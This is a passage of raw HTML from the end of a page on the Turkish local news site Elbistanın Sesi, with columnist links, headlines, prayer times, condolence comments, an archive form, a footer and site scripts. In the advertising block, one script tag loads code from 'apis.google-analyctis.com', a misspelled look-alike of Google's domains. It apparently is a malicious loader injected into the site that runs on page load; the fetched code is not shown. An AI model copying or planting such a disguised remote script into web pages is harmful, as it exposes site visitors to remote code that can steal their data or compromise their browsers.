            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/mevsim-bahar-olunca-makale,6549.html" title="MEVSİM BAHAR OLUN­CA" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Ramazan-Pamuk_910_1.jpg" alt="Ramazan Pamuk">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/23/ramazan-pamuk" title="Ramazan Pamuk">Ramazan Pamuk</a></h4>
              <a href="https://www.elbistaninsesi.com/mevsim-bahar-olunca-makale,6549.html" title="MEVSİM BAHAR OLUN­CA" >MEVSİM BAHAR OLUN­CA</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/alt-tabaka-makale,6538.html" title="ALT TA­BA­KA" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Can-Ugur_919_1.jpg" alt="Can Uğur">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/17/can-ugur" title="Can Uğur">Can Uğur</a></h4>
              <a href="https://www.elbistaninsesi.com/alt-tabaka-makale,6538.html" title="ALT TA­BA­KA" >ALT TA­BA­KA</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/imar-toplantisi-makale,6528.html" title="İMAR TOP­LAN­TI­SI" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/yazarlar_koYesi.jpg" alt="Aykut YILDIRIM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/70/aykut-yildirim" title="Aykut YILDIRIM">Aykut YILDIRIM</a></h4>
              <a href="https://www.elbistaninsesi.com/imar-toplantisi-makale,6528.html" title="İMAR TOP­LAN­TI­SI" >İMAR TOP­LAN­TI­SI</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/milli-mucadelemizin-102-yilinda-maras-ve-elbistan-makale,6522.html" title="Milli Mü­ca­de­le­mi­zin 102. Yı­lın­da Maraş Ve El­bis­tan" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/034421b8-4158-4551-83a7-c308f4156fe9.jpg" alt="Orhan SAYDAM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/89/orhan-saydam" title="Orhan SAYDAM">Orhan SAYDAM</a></h4>
              <a href="https://www.elbistaninsesi.com/milli-mucadelemizin-102-yilinda-maras-ve-elbistan-makale,6522.html" title="Milli Mü­ca­de­le­mi­zin 102. Yı­lın­da Maraş Ve El­bis­tan" >Milli Mü­ca­de­le­mi­zin 102. Yı­lın­da Maraş Ve El­bis­tan</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/neyleyim-makale,6520.html" title="NEY­LEYİM" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Mahir_BaYpYnar.jpg" alt="Mahir Başpınar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/57/mahir-baspinar" title="Mahir Başpınar">Mahir Başpınar</a></h4>
              <a href="https://www.elbistaninsesi.com/neyleyim-makale,6520.html" title="NEY­LEYİM" >NEY­LEYİM</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/zen-makale,6503.html" title="ZEN" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Prof._Dr._Mustafa_Necati_DaglY.jpg" alt="Prof. Dr. Mustafa Necati Daglı">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/90/prof-dr-mustafa-necati-dagli" title="Prof. Dr. Mustafa Necati Daglı">Prof. Dr. Mustafa Necati Daglı</a></h4>
              <a href="https://www.elbistaninsesi.com/zen-makale,6503.html" title="ZEN" >ZEN</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/ahlakin-destek-ve-direnci-kac-makale,6418.html" title="Ahlakın destek ve direnci kaç?" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/vesikalYk_a_g.jpeg" alt="Ahmet Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/3/ahmet-gocer" title="Ahmet Göçer">Ahmet Göçer</a></h4>
              <a href="https://www.elbistaninsesi.com/ahlakin-destek-ve-direnci-kac-makale,6418.html" title="Ahlakın destek ve direnci kaç?" >Ahlakın destek ve direnci kaç?</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/kaderi-insanlar-mi-yazar-yazilan-kaderi-mi-yasar-makale,6396.html" title="KADERİ İNSANLAR MI YAZAR, YAZILAN KADERİ Mİ YAŞAR ?" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/kitap1.jpg" alt="Sevda Küçük">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/62/sevda-kucuk" title="Sevda Küçük">Sevda Küçük</a></h4>
              <a href="https://www.elbistaninsesi.com/kaderi-insanlar-mi-yazar-yazilan-kaderi-mi-yasar-makale,6396.html" title="KADERİ İNSANLAR MI YAZAR, YAZILAN KADERİ Mİ YAŞAR ?" >KADERİ İNSANLAR MI YAZAR, YAZILAN KADERİ Mİ YAŞAR ?</a>
            </div>
          </a>
          </div>
              </div>
    </div>
  </div>

  
  <!-- SON DAKIKA VE OZEL HABER -->
  <div class="sonozeltab">

    <ul class="nav nav-tabs" id="sonozel">
      <li class="active"><a href="#sondakika" data-toggle="tab" class="sondakika">Son Dakika</a></li>      <li class=""><a href="#ozelhaber" data-toggle="tab" class="ozelhaber">Özel Haber</a></li>    </ul>

    <div class="tab-content">

            <div class="tab-pane active" id="sondakika">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="https://www.elbistaninsesi.com/guncel/adiyamandaki-deprem-elbistanda-da-hissedildi-h73156.html" title="Adıyaman’daki deprem, Elbistan’da da hissedildi" >Adıyaman’daki deprem, Elbistan’da da hissedildi</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/guncel/ustune-catidan-kar-kutlesi-dusen-adam-hastanelik-oldu-h72632.html" title="Üstüne çatıdan kar kütlesi düşen adam hastanelik oldu" >Üstüne çatıdan kar kütlesi düşen adam hastanelik oldu</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/guncel/hz-hamza-cami-icin-hayirseverlerden-destek-talebi-h72569.html" title="Hz. Hamza Cami için hayırseverlerden destek talebi" >Hz. Hamza Cami için hayırseverlerden destek talebi</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/vefatlar/edibe-odacioglu-87-yasinda-h71859.html" title="Edibe Odacıoğlu 87 yaşında" >Edibe Odacıoğlu 87 yaşında</a></li>
          
          <li class="last"><a href="https://www.elbistaninsesi.com/guncel/polisten-motosiklet-suruculerine-hayat-kurtaracak-hediye-h71612.html" title="Polisten motosiklet sürücülerine hayat kurtaracak hediye" >Polisten motosiklet sürücülerine hayat kurtaracak hediye</a></li>
                  </ul>
      </div>
      
            <div class="tab-pane" id="ozelhaber">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="https://www.elbistaninsesi.com/ekonomi/yapalak-santralinin-gelecegini-migemin-gorusu-belirleyecek-h37268.html" title="Yapalak santralinin geleceğini, MİGEMin görüşü belirleyecek" >Yapalak santralinin geleceğini, MİGEM’in görüşü belirleyecek</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/vefatlar/durmus-ali-yavuz-80-yasinda-h37225.html" title="Durmuş Ali Yavuz 80 yaşında" >Durmuş Ali Yavuz 80 yaşında</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/ekonomi/pancardaki-polar-orani-mahkemelik-oldu-h37167.html" title="Pancardaki polar oranı, mahkemelik oldu" >Pancardaki polar oranı, mahkemelik oldu</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/guncel/boyle-saka-gorulmedi-h34847.html" title="Böyle şaka görülmedi!" >Böyle şaka görülmedi!</a></li>
          
          <li class="last"><a href="https://www.elbistaninsesi.com/guncel/eshab-i-kehf-kulliyesine-konaklama-tesisi-h34004.html" title="Eshab-ı Kehf Külliyesine konaklama tesisi" >Eshab-ı Kehf Külliyesi’ne konaklama tesisi</a></li>
                  </ul>
      </div>
      
    </div>
  </div>
  
<!-- NAMAZ VAKITLERI -->
  <div class="namazvakitleri">
    <div class="title">
      <h5>Namaz Vakitleri</h5>
      <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right">
                <option value="adana" >Adana</option>
                <option value="adiyaman" >Adıyaman</option>
                <option value="afyon" >Afyon</option>
                <option value="agri" >Ağrı</option>
                <option value="aksaray" >Aksaray</option>
                <option value="amasya" >Amasya</option>
                <option value="ankara" >Ankara</option>
                <option value="antalya" >Antalya</option>
                <option value="ardahan" >Ardahan</option>
                <option value="artvin" >Artvin</option>
                <option value="aydin" >Aydın</option>
                <option value="balikesir" >Balıkesir</option>
                <option value="bartin" >Bartın</option>
                <option value="batman" >Batman</option>
                <option value="bayburt" >Bayburt</option>
                <option value="bilecik" >Bilecik</option>
                <option value="bingol" >Bingöl</option>
                <option value="bitlis" >Bitlis</option>
                <option value="bolu" >Bolu</option>
                <option value="burdur" >Burdur</option>
                <option value="bursa" >Bursa</option>
                <option value="canakkale" >Çanakkale</option>
                <option value="cankiri" >Çankırı</option>
                <option value="corum" >Çorum</option>
                <option value="denizli" >Denizli</option>
                <option value="diyarbakir" >Diyarbakır</option>
                <option value="duzce" >Düzce</option>
                <option value="edirne" >Edirne</option>
                <option value="elazig" >Elazığ</option>
                <option value="erzincan" >Erzincan</option>
                <option value="erzurum" >Erzurum</option>
                <option value="eskisehir" >Eskişehir</option>
                <option value="gaziantep" >Gaziantep</option>
                <option value="giresun" >Giresun</option>
                <option value="gumushane" >Gümüşhane</option>
                <option value="hakkari" >Hakkari</option>
                <option value="hatay" >Hatay</option>
                <option value="igdir" >Iğdır</option>
                <option value="isparta" >Isparta</option>
                <option value="istanbul" >İstanbul</option>
                <option value="izmir" >İzmir</option>
                <option value="kahramanmaras" selected>Kahramanmaraş</option>
                <option value="karabuk" >Karabük</option>
                <option value="karaman" >Karaman</option>
                <option value="kars" >Kars</option>
                <option value="kastamonu" >Kastamonu</option>
                <option value="kayseri" >Kayseri</option>
                <option value="kirikkale" >Kırıkkale</option>
                <option value="kirklareli" >Kırklareli</option>
                <option value="kirsehir" >Kırşehir</option>
                <option value="kilis" >Kilis</option>
                <option value="izmit" >Kocaeli</option>
                <option value="konya" >Konya</option>
                <option value="kutahya" >Kütahya</option>
                <option value="malatya" >Malatya</option>
                <option value="manisa" >Manisa</option>
                <option value="mardin" >Mardin</option>
                <option value="mersin" >Mersin</option>
                <option value="mugla" >Muğla</option>
                <option value="mus" >Muş</option>
                <option value="nevsehir" >Nevşehir</option>
                <option value="nigde" >Niğde</option>
                <option value="ordu" >Ordu</option>
                <option value="osmaniye" >Osmaniye</option>
                <option value="rize" >Rize</option>
                <option value="adapazari" >Sakarya</option>
                <option value="samsun" >Samsun</option>
                <option value="siirt" >Siirt</option>
                <option value="sinop" >Sinop</option>
                <option value="sivas" >Sivas</option>
                <option value="sanliurfa" >Şanlıurfa</option>
                <option value="sirnak" >Şırnak</option>
                <option value="tekirdag" >Tekirdağ</option>
                <option value="tokat" >Tokat</option>
                <option value="trabzon" >Trabzon</option>
                <option value="tunceli" >Tunceli</option>
                <option value="usak" >Uşak</option>
                <option value="van" >Van</option>
                <option value="yalova" >Yalova</option>
                <option value="yozgat" >Yozgat</option>
                <option value="zonguldak" >Zonguldak</option>
              </select>
    </div>
      <div class="sonuc">

      <table cellspacing="0" cellpadding="0" id="vakitler">
          <tr>
            <th>İmsak</th>
            <th>Güneş</th>
            <th>Öğle</th>
            <th>İkindi</th>
            <th>Akşam</th>
            <th>Yatsı</th>
          </tr>
          <tr>
            <td>05:11</td>
            <td>06:31</td>
            <td>12:45</td>
            <td>16:10</td>
            <td>18:49</td>
            <td>20:05</td>
          </tr>
      </table>


      </div>

  </div>

  <div class="reklam reklam208"><iframe name=BIKADV src="https://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe>
<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div>
  <!-- SON YORUMLAR -->
  <div class="son-yorumlar">
    <div class="header">
      <h5>Son Yorumlar</h5>
    </div>
    <div class="content">
      <ul class="unstyled hs-liste add-last">
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mustafa-atasayar-70-yasinda-h73191.html#comment_375636" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/ali-ihsan-sakalar-73-yasinda-h73163.html#comment_375635" title="" >ALİ İHSAN ABİYE ALLAHTAN RAHMET,SEVENLERİNE...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mustafa-atasayar-70-yasinda-h73191.html#comment_375634" title="" >Allah rahmet eylesin mekanı Cennet olsun.Tüm...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mustafa-atasayar-70-yasinda-h73191.html#comment_375633" title="" >Allah rahmet eylesin mekanı cennet olsun.</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mustafa-atasayar-70-yasinda-h73191.html#comment_375632" title="" >Mekanı cennet olsun.Yakınlarına başsağlığı...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/ali-ihsan-sakalar-73-yasinda-h73163.html#comment_375631" title="" >Allah rahmet eylesin, mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mustafa-atasayar-70-yasinda-h73191.html#comment_375630" title="" >Allah rahmet eylesin .mekanı cennet olr...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mustafa-atasayar-70-yasinda-h73191.html#comment_375629" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mustafa-atasayar-70-yasinda-h73191.html#comment_375628" title="" >&#34;İnnâ lillâhi ve innâ ileyhi râciûn&#34;...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mustafa-atasayar-70-yasinda-h73191.html#comment_375627" title="" >Allah Rahmet eylesin Mekânı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/nilsun-demirci-h73103.html#comment_375626" title="" >NILSUN ABLAMA ALLAHTAN RAHMET ABDULLAH ABIYE...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mustafa-atasayar-70-yasinda-h73191.html#comment_375625" title="" >Allah cc Gani Gani rahmet eylesin mekanı...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mustafa-atasayar-70-yasinda-h73191.html#comment_375624" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mustafa-atasayar-70-yasinda-h73191.html#comment_375623" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mustafa-atasayar-70-yasinda-h73191.html#comment_375622" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mustafa-atasayar-70-yasinda-h73191.html#comment_375621" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/gani-yayci-58-yasinda-h73029.html#comment_375620" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mustafa-atasayar-70-yasinda-h73191.html#comment_375619" title="" >merhuma Allah tan rahmet yakınlarına baş...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mustafa-atasayar-70-yasinda-h73191.html#comment_375618" title="" >Merhuma ALLAH&#39;tan rahmet ailesine yakınlarına...</a></li>
                <li class="last"><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mustafa-atasayar-70-yasinda-h73191.html#comment_375617" title="" >Allah rahmet etsin.Mekanı cennet olsun.Ailesinin...</a></li>
              </ul>
    </div>
  </div>

  
<!-- ARSIV -->
<div class="arsiv">
  <div class="header">
    <h5>Arşiv</h5>
  </div>
  <div class="content">
    <form action="https://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" >
      <select name="gun" class="day span1">
                <option value="01" >01</option>
                <option value="02" >02</option>
                <option value="03" >03</option>
                <option value="04" >04</option>
                <option value="05" >05</option>
                <option value="06" >06</option>
                <option value="07" >07</option>
                <option value="08" >08</option>
                <option value="09" >09</option>
                <option value="10" >10</option>
                <option value="11" >11</option>
                <option value="12" >12</option>
                <option value="13" >13</option>
                <option value="14" >14</option>
                <option value="15" >15</option>
                <option value="16" >16</option>
                <option value="17" >17</option>
                <option value="18" >18</option>
                <option value="19" selected>19</option>
                <option value="20" >20</option>
                <option value="21" >21</option>
                <option value="22" >22</option>
                <option value="23" >23</option>
                <option value="24" >24</option>
                <option value="25" >25</option>
                <option value="26" >26</option>
                <option value="27" >27</option>
                <option value="28" >28</option>
                <option value="29" >29</option>
                <option value="30" >30</option>
                <option value="31" >31</option>
              </select>
      <select name="ay" class="month span1">
                <option value="01" >Ocak</option>
                <option value="02" >Şubat</option>
                <option value="03" selected>Mart</option>
                <option value="04" >Nisan</option>
                <option value="05" >Mayıs</option>
                <option value="06" >Haziran</option>
                <option value="07" >Temmuz</option>
                <option value="08" >Ağustos</option>
                <option value="09" >Eylül</option>
                <option value="10" >Ekim</option>
                <option value="11" >Kasım</option>
                <option value="12" >Aralık</option>
              </select>
      <select name="yil" class="year span1">
                <option value="2022" selected>2022</option>
                <option value="2021" >2021</option>
                <option value="2020" >2020</option>
                <option value="2019" >2019</option>
                <option value="2018" >2018</option>
              </select>
      <button type="submit" class="btn btn-default span1 pull-right">Ara</button>
    </form>
  </div>
</div>


  


        </div>
        
      </div>

        
                <!-- Sol Dikey Reklam -->
        <div class="reklam dikey sol" style="width:px;height:px;">

                                                                                                                                                                            </div>
        
        <!-- Sağ Dikey Reklam -->
        <div class="reklam dikey sag ortala" style="width:px;height:px;">

                                                                <p style="width:160px;"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- kaynarca -->
<ins class="adsbygoogle"
 style="display:block"
 data-ad-client="ca-pub-3633419220222736"
 data-ad-slot="5807534991"
 data-ad-format="auto"
 data-full-width-responsive="true"></ins>
<script>
 (adsbygoogle = window.adsbygoogle || []).push({});
</script></p>
              
                                                                                                                                                                                                      </div>

        
      </div>

      <!-- FOOTER -->
<div id="siteFooter" class="footer">

      <div class="row-fluid">
      <div class="container center">
        <div class="span4">
          <div>Copyright © 2022 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div>
          <div class="footer-social">
            <a href="https://facebook.com/elbistaninsesi" rel="nofollow"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a>
            <a href="https://twitter.com/elbistaninsesi" rel="nofollow"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a>
            <a href="https://www.elbistaninsesi.com/rss"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a>
          </div>
        </div>
        <div class="span4 text-center">
          <div class="footer-logo"><a href="https://www.elbistaninsesi.com/" class="logo"><img src="https://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Döndü Üzüm 87 yaşında" /></a></div>
        </div>
        <div class="span4">
          <p>&lt;center&gt;

0 (344) 415 04 15 &lt;br&gt;
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="94f1f8f6fde7e0f5fafdfae7f1e7fdf3f5eef1e0f1e7fdd4f3f9f5fdf8baf7fbf9">[email&#160;protected]</a>
&lt;br&gt;Kızılcaoba Mah. Kışla Cad. 19/1&lt;/center&gt;

    </p>          <p><span class="site-info glyphicons earphone" style="padding-left: 0;"></span> 0 (344) 415 04 15</p>        </div>
      </div>
      </div>

      <div id="footer-alt" class="row-fluid">

        <div class="container center">

        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/sitene-ekle.html" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div>
        </div>

        </div>
      </div>



      <div class="row-fluid">
      <div class="container center">
        <div class="span12 text-center">
          <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p>         <a href="https://www.tebilisim.com/" target="_blank" title="haber sistemi, haber scripti, haber yazılımı, tebilişim"><p>Yazılım: TE Bilişim</p></a> 
        </div>
      </div>
      </div>

  <div id="top" class="btn btn-inverse">Yukarı Çık</div>
</div>
      <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>
var facebook_paylasim_secret_token, facebook_paylasim_app_id;
facebook_paylasim_app_id = "";
facebook_paylasim_secret_token = "";
if (location.href.match(/\?.*/) && document.referrer) {
   location.href = location.href.replace(/\?.*/, '');
}
</script>
<div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
  <div class="modal-header">
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
    <h3 id="myModalLabel">Üye Girişi</h3>
  </div>
  <div class="modal-body">
<form class="form-horizontal" action="https://www.elbistaninsesi.com/index.php?m=login&amp;rd=https%3A%2F%2Fwww.elbistaninsesi.com%2Fvefatlar%2Fdondu-uzum-87-yasinda-h73200.html" method="post">
  <div class="control-group">
    <label class="control-label" for="inputName">Kullanıcı Adı</label>
    <div class="controls">
      <input id="inputName" value="" name="kullanici" type="text"  placeholder="Kullanıcı Adı" required>
    </div>
  </div>
  <div class="control-group">
    <label class="control-label" for="inputPassword">Şifre</label>
    <div class="controls">
      <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required>
    </div>
  </div>
  <div class="control-group">
    <div class="controls">
      <button type="submit" class="btn hs-sdch btn-info">Giriş Yap</button>
    </div>
  </div>
</form>
  </div>
  <div class="modal-footer">
    <a href="https://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a>
    <a href="https://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a>
    <button class="btn hs-sdch btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button>
  </div>
</div>




<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/hs-paylas.min.js"></script><script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/system.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/text.js"></script>
<script type="text/javascript">

	new UISearch( document.getElementById( 'sb-search' ) );

	$(function(){
							});

		$("#comment_list .text").pKisalt();
	
		var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML,
	gsSpace   = ' ',
	gsUrl   = location.href;
	$("#paylas").jsSocials({
		url: location.href,
		text: gsTitle,
		showCount: true,
		showLabel: false,
		shares: [
			{ share: "twitter", via: "elbistaninsesi", hashtags: "Elbistanın Sesi" },
            { share: "whatsapp", text: "Bunu bilmelisin!"},
            "facebook",
            "linkedin",
            "pinterest",
			]
		});
							$('#haber > .page-header').waypoint(function(direction) {
		  $('#article-finished').toggleClass('hiding', direction === "up");
		}, {
		  offset: function() {
		    return $.waypoints('viewportHeight') - $(this).height() - 750;
		  }
		});
			var hasBeenClicked = false;
	var kisa_site_adi = "Elbistanın Sesi";
	var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com";

	$(document).on('copy', function(e){
		if ($(e.target).closest("#yorumlar,textarea,input").length) {
			hasBeenClicked = true;
		} else {
			hasBeenClicked = false;
		}
	  var sel = window.getSelection();
	  var copyFooter = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi;
	  var copyHolder = $('<div>', {html: sel+copyFooter, style: {position: 'absolute', left: '-99999px'}});
	  if (!hasBeenClicked){
	  	$('body').append(copyHolder);
	  	sel.selectAllChildren( copyHolder[0] );
	  	window.setTimeout(function() {
	      copyHolder.remove();
	  	},0);
	 }
	});
		
	
	
	
	
	


		tebilisim('73200', 'haber', '');
	
</script>

    	    
	
	
    
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-21655627-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-21655627-1');
</script>
<!-- End Google Analytics -->



  </body>
</html>
